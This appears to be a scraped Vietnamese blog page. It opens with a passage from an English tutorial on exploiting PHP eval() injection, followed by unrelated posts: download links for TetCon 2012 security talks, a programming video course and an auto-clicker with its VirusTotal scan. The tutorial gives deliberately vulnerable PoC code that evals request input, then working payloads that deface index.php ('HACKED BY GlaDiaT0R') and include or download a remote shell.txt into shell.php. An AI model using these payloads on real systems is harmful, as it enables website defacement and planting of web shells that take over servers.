$string= preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$string','ob_start();eval("print $string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
echo $string;
?>

----------

PoC 2 :
<?php
$Ev = $_GET['ev'];
$eva = stripslashes($Ev);
eval($eva);
?>

----------

PoC 3 :

<?php
$string = stripslashes($HTTP_USER_AGENT);
$string = preg_replace_callback("/(<\?=)(.*?)\?>/si",create_function('$string','ob_start();eval("$string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
$string= preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$string','ob_start();eval("print $string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
echo $string;
?>

=======================================================

[4]-Exploiting..

----------
Write or Create a page containing : Hacked by ...
<?php $z=fopen("index.php",'w');fwrite($z,("HACKED BY GlaDiaT0R"));fclose($z); ?>

or

$z=fopen("index.php",'w');fwrite($z,("HACKED BY GlaDiaT0R"));fclose($z);
----------
To insert a remote page include using an url
<?php include('http://www.website.com/shell.txt'); ?>

or

include('http://www.website.com/shell.txt');
----------
Insertion of a distant code in the vulnerable website
<?php $z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://www.website.com/shell.txt"));fclose($z); ?>

or

$z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://www.website.com/shell.txt"));fclose($z);
----------

Thank you for your attention. I hope you understood the process to exploit the eval () vulnerability .
 

[Ebook] Tổng hợp các bài tham luận tại tetcon 2012

1. Phát hiện lỗi phần mềm thông qua kỹ thuật Fuzzing thông minh-Phạm Văn Toàn
 http://www.mediafire.com/?k2z717z9m2trld8
2. Những lỗ hổng ít được biết đến và cách phòng chống-Dương Ngọc Thái
http://www.mediafire.com/?pimdtbwl4natj02
3. Mua hàng không mất tiền lỗ hổng trong hệ thống thanh toán trực tuyến tại Việt Nam-Nhâm Xuân Nam
 http://www.mediafire.com/?725js96xcbdrw2s
4.Tấm công sandbox và sử dụng AV làm tấm lá chắn bảo về malware- Nguyễn Phố Sơn
 http://www.mediafire.com/?96hygetazz2dadn
5.Tấn Công Beats-Juliano Rizzo
http://www.mediafire.com/?y527u8va0x67v5m
6. Hai kỹ thuật tối ưu tấn công Blind SQL Injection- Nguyễn Hoàng Thịnh
http://www.mediafire.com/?jri611fdfude74r
 

Video book khổng lồ về lập trình và tin học

Bộ video book tổng hợp khá đầy đủ các giáo trình về tin học, lập trình. Trong link có giáo trình PHP, C, SQL... và còn rất rất nhiều nữa anh em mở link ra xem sẽ rõ. Giáo trình được thực hiện bằng video nên dễ hiểu và trực quan hơn đọc ebook.
Share cho anh em nhất là các anh em đang bắt đầu học code.
Link download:
http://www.mediafire.com/?t1ze73nafc37q
 

Auto Clicker 3.0 [No Virus]


Free Mouse Auto Clicker 3.0

Free Mouse Auto Clicker 3.0 là phần mềm giúp bạn tự động click (Auto Click) vào 1 nơi bất kỳ trên màn hình mà không cần phải ngồi bấm chuột.

Hướng dẫn sử dụng:
Sau khi khởi động chương trình,
1. Bạn thiết lập thời gian giãn cách tại mục Click Interval.
2. Click Options là nơi bạn thiết lập sẽ tự động click chột trái hay chuột phải, click 1 cái hay click đúp
3. Ở mục Click Hotkey, bạn có thể thiết lập phím tắt sẽ bắt đầu tự động click và phím tắt ngưng tự động click
4. Bấm start để bắt đầu hoặc có thể dùng phím tắt đã thiết lập ở mục Click Hotkey.
5. Sau khi start thì bạn rê con chuột đi bất cứ vị trí nào trên màn hình thì nó sẽ tự động click liên tục ở vị trí đó (Thời gian giãn cách giữa 2 click phụ thuộc vào bạn thiết lập ở "Click Interval" thế nào).
6. Nếu bạn không muốn auto click nữa thì click vào nút Stop hoặc bấm phím tắt đã thiết lập ở Click Hotkey

Download:
http://sinhvienit.net/@forum/attachm...ickerSetup.rar

Kết quả kiểm tra Virus trên virustotal.com

SHA256: 1563c8d90c3fc85b6b741d51df74caf94f1783028e35005294 fe17a95fd99eac
SHA1: 09036ddbd6a90cc872e06eb4b56336de81c000bb
MD5: 2aded45593b0d1377474808a129b6032
File size: 458.0 KB ( 468946 bytes )
File name: FreeMouseAutoClickerSetup.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 0 / 37


Antivirus Result Update
AhnLab-V3 - 20120922
AntiVir - 20120922
Antiy-AVL - 20120911
Avast - 20120922
AVG - 20120922
BitDefender - 20120922
ByteHero - 20120922
CAT-QuickHeal - 20120922
ClamAV - 20120922
Commtouch - 20120922
Comodo - 20120922
DrWeb - 20120922
Emsisoft - 20120919
ESET-NOD32 - 20120922
F-Prot - 20120922
Fortinet - 20120922
GData - 20120922
Ikarus - 20120922
Jiangmin - 20120922
K7AntiVirus - 20120921
Kaspersky - 20120922
McAfee - 20120922
McAfee-GW-Edition - 20120922
Microsoft - 20120922
Norman - 20120922
nProtect - 20120921
PCTools - 20120922
Sophos - 20120922
SUPERAntiSpyware - 20120911
Symantec - 20120922
TheHacker - 20120920
TotalDefense - 20120921
TrendMicro - 20120922
TrendMicro-HouseCall - 20120922
VBA32 - 20120921
VIPRE - 20120922
ViRobot - 20120922
 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương